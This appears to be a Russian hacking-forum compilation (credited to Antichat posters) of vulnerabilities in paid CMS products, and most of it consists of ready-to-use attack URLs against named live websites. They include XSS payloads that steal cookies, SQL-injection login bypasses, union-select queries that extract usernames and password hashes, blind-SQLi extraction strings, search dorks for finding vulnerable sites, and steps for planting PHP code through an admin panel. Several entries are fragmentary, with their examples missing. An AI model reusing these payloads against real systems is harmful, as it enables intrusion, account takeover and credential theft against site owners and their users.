Обзор уязвимостей в платных CMS

SMS-PARTNERS CMS

http://demo.sms-partners.ru/page-contacts/%3E'%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E

 

sql-injection in PHPKB 1.5 # старые версии 1.5, в новых багу пропатчили но версию не сменили
Online Knowledgebase Builder System
target/admin
login: admin' or 1=1/*
pass: fackthemall

пример:
panther.hartnell.edu/faqs/admin/

 

CustomCMS (CCMS)
Цена: ~55 $
Активная XSS

/inbox.html
В теле письма

/notepad.html

/index.php?page=Edit+Profile
Уязвимы все поля

/newthread-1.html
В Title

Пассивные XSS
/pm.php?action=Send&rec=1"><script>alert();</script>


/gamesearch.html
в поле Search

SQL Инъекции:

Будет 404
У меня например вывелось.

6 Поле делат редирект.

Раскрытие путей
/thumbnailer.php?type[]=avatar


Выполнение произвольного кода через админку:

PS
Боже мой...

(с) Ctacok Специально для Antichat.ru

 

Заливка шелла в ABO.CMS

[1] Управление -> Скрипты -> Добавить скрипт:

Название: test
Описание: test
Содержимое: <?phpinfo();?>
Сохранить​

[2] Страницы и структура -> Выбираем страницу (предположим что это будет "Новости") -> Выбираем поле (кликаем на него) и выбираем модуль Скрипты (кликаем на него) и жмем Добавить модуль -> Сохранить
Переходим на ту страницу куда добавили модуль (предположим что это будет "Новости").

 

Saitika CMS

http://saitika.ru/

Blind SQL inj

Конкретный пример:

-------------------------------------------------------------------
Site edit CMS

http://siteedit.ru/

Passive XSS

-------------------------------------------------------------------
(с) Twin $park

 

CMS I-market

http://www.i-market.ru/

Blind SQL inj

пример:

(с) Twin $park

 

D.S CMS

http://demo.smolovich.ru/ фиксированная цена отсутствует

SQL inj

пример:

XSS

(с) Twin $park

 

Laderett CMS

http://www.lederett.de/

SQL inj

паример:

XSS

(с) Twin $park

 

Product: Armixcms
Author: armixcms.ru

Blind-SQL?
http://www.armixcms.ru/?id=25'+and+1=1/*
http://www.armixcms.ru/?id=25%27+and+if%28substring%28version%28%29,1,1%29=5,1,0%29+--+
логика срабатывает,но при попытке подбора столбцов,я уперся в 0.Мои запросы тупо игнорировались.Если ктотоподберет столбцы,милости прошу в лс,отредактирую сообщение с вашими копирайтами.
Спасибо ElteRUS.раскручиваеться как слепая.

Code:

http://www.armixcms.ru/?id=25'+and+if(ascii(substring((select+table_name+ from+information_schema.columns+where+column_name+ like+0x257061737325+limit+0,1),3,1))=116,1,0)--+

 

- "CMS MYSITE"

Дорк:
"на базе CMS MYSITE", "Результати 1 – 10 з приблизно 228 000 на запит "на базе CMS MYSITE". (0,31 сек)"

==================================================

Уязвимость: sqli - из-за недостаточной фильтрации данных в параметре cid

Выбераем любой сайт, и проверяем его наличие...

HTML:

http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_website,2+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1

Получаем логин...

HTML:

http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+username,2+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1

Получаем пароль, расшифровуем (обычный md5)...

HTML:

http://lookmy.info/portal/modules.php?name=Content&pa=list_pages_categories&cid=-42+union+select+user_password,2+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+&pages_number=1

Логинимся...

HTML:

http://lookmy.info/portal/modules.php?name=Your_Account

Ещё способы получить пароли к сайтам.

==================================================

Уязвимость: SQLinj - из-за недостаточной фильтрации данных в параметрах gid, pid в модуле фотоальбома

Принцип практически тот же..

HTML:

http://www.vfs.com.ua/index.php?id=5&show=4nalbum&do=showpic&pid=-42+union+select+user_website+from+inform_users+where+user_website+LIKE+0x2575626225+LIMIT+0,1--+

Уязвимость: SQLinj - из-за недостаточной фильтрации данных в пост параметрах price_from, price_to, htlNfrom, htlNto, datePlusMinus в модуле поиска.

Вот один из параметров

HTML:

http://tour.lookmy.info/index.php?id=3815&show=14071
resortsToShow=all&countryKey=all&cityKey=all&CatHot=all&price_from=0+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))&price_to=10000&day=12&mon=02&year=2010&datePlusMinus=2&htlNfrom=7&htlNto=15&roomNA=1&roomNC=0&htlBK=all&showRows=30+&btn_find=%CF%EE%E8%F1%EA%21

Создать сайт можно впринципе бесплатно. Но все модули для него платные, потому и поместил его в "платные".

(c)v1d0q

 

- "Stress web 8.0" - платная cms для MMORPG Lineage2

Дорк:
Результати 1 – 10 з приблизно 4 800 на запит inurl:"index.php?f=forget". (0,06 сек)

Особенность:
Magic_quotes_gpc = off

Один из способов узнать версию, если папка install не удалена - /install/license.lic

==================================================

Уязвимость: sqli - из-за недостаточной фильтрации данных в параметр step2. Файл forget.php

Фильтр

PHP:

function safe($sql)
    {
        if ($this->mysql_link)
            return mysql_real_escape_string($sql, $this->mysql_link);
        else
            return mysql_escape_string($sql);
    }

Первый шаг

PHP:

elseif (isset($_POST["submit_lost"]) && isset($_POST["step1"]))
{
    if ($_POST["l2sec_code"] != $_SESSION["sw_captcha"] or !$_SESSION["sw_captcha"])
    {
        $error_lost = "<div class='error'>Обнаружены следующие ошибки:<br>Код безопасности не соответствует отображённому.</div>";
    }
    else
    {
        $_SESSION["sw_captcha"] = false;
        $lost_l2login = $ldb->safe($_POST["lost_l2login"]);
        $sel_question = $ldb->query("SELECT `l2question` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1");

Второй шаг

PHP:

elseif (isset($_POST["submit_lost"]) && isset($_POST["step2"]))
{
    $lost_l2answer = $_POST["lost_l2answer"];
    $lost_l2login = $_POST["step2"];
    list($lost_l2answer_db, $_l2email) = $ldb->fetch_array($ldb->query("SELECT `l2answer`,`l2email` FROM `accounts` WHERE `login`='{$lost_l2login}' LIMIT 0,1"));
    if ($lost_l2answer != $lost_l2answer_db)
    {
        $error_lost = "<div class='error'>Обнаружены следующие ошибки:<br>Ответ на секретный вопрос не верный!</div>";
    }

Как видим, в post параметре step2 (второй шаг формы "забыли пароль"), не фильтруется логин участника, из-за чего и имеем данную уязвимость. Как эксплуатировать? Я думаю разберётесь

(c)v1d0q

 

DSite CMS
http://www.dsite.ru/
Компания Media Programming Group

SQL inj

Code:

http://www.ttplus.ru/index.php?id=8&div_id=-88+union+select+version(),user(),database(),@@version_compile_os,5--+

SQL inj

Code:

http://www.ttplus.ru/index.php?id=16&article=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+

 

http://www.webmotor.ru/
CMS система WebMotor

SQL inj
Класика жанра.
Пример где сработало:
http://kids-garden.ru/

Code:

<tr><td><b>E-mail</b>:</td><td><input type=text name="email" class="tlog1" value=""></td></tr>
<tr><td><b>Пароль</b>:</td><td><input type=password name=password class="tlog1" value=""></td></tr>
<tr><td></td><td><input type=submit value=" Войти " class="enter_01"></td></tr>

name = блабла' or 1=1--
пасс любой.
Есть вывод ошибки. Значит можна вытаскивать информацию в ошибку!

 

Orcando CMS

XSS

Code:

[URL=http://www.orcando.de/de/search/]http://www.orcando.de/de/search/[/URL] 

В поиске:

​

 

Update Orcando CMS

Раскрытие Пути

Code:

[URL=http://www.orcando.de/de/search/]http://www.orcando.de/de/search/[/URL] 

В поиске вписываем:

PHP:

aaa sss ss s</

Result:

 

Dev4u CMS

Активная XSS
http://www.dev4u.de/cms/online-demo.php?seite_id=199
Вписываем в:

PHP:

 "><script>alert('xss')</script> 

Пассивная XSS
http://www.dev4u.de/cms/faq.php?tag=Programmierkenntnisse"><script>alert(01010)</script>
+xss в поиске

путь: http://www.dev4u.de/sitemap.xml
​

 

intellisite® CMS
Passive XSS
off site: http://www.intellisite.ch/index.php?nav= [XSS]
<script>alert(01010)</script>
+ в Поиске

 

Fastpublish CMS 2.0.x

SQL injection
/aufbau/comment.php
Пример:

Code:

http://www.fastpublish.de/aufbau/comment.php?artikel=106' limit 0 union select 1,0x6465,3,4,5,6,7,8,9,version(),11,12,13,14,15,16  ,17,18,19,0x434d53,21 --+1&popup=true

Путь+USER: http://www.fastpublish.de/aufbau/comment.php?artikel=106

Code:

[SIZE=2]wwwrun@localhost[/COLOR]
/www/htdocs/w0081419/Original_Neu/aufbau/comment.php[/SIZE]

 

Nexecuttive CMS
офф сайт: http://nexecutive.de/

SQL Injection:

Code:

http://nexecutive.de/glossar.php?i=glossary&g=showDef&categoryID=16+and+substring(version(),1,1)=3

(3.23.58-log) -версия.

Можно делать UPDATE:

Code:

http://nexecutive.de/update_nexecutive_db.php

Активная xss:
При регистрации, почти все поля.

Code:

http://nexecutive.de/index.php?i=register&languCode=de

Пассивная xss:

Code:

[SIZE=2]http://nexecutive.de/cms-shop.php?i=nexec_detail&ktID=33&categoryID=48"><script>alert(document.cookie)</script>[/SIZE]

и во многих других местах

Путь:

Code:

[SIZE=2]http://nexecutive.de/spaw2/dialogs/dialog.php
http://nexecutive.de/logIn_openID.php
http://nexecutive.de/nexeclib/geomarkers.php
http://nexecutive.de/admin_modul/admin_admin.php
http://nexecutive.de/spaw2/spaw.inc.php[/SIZE]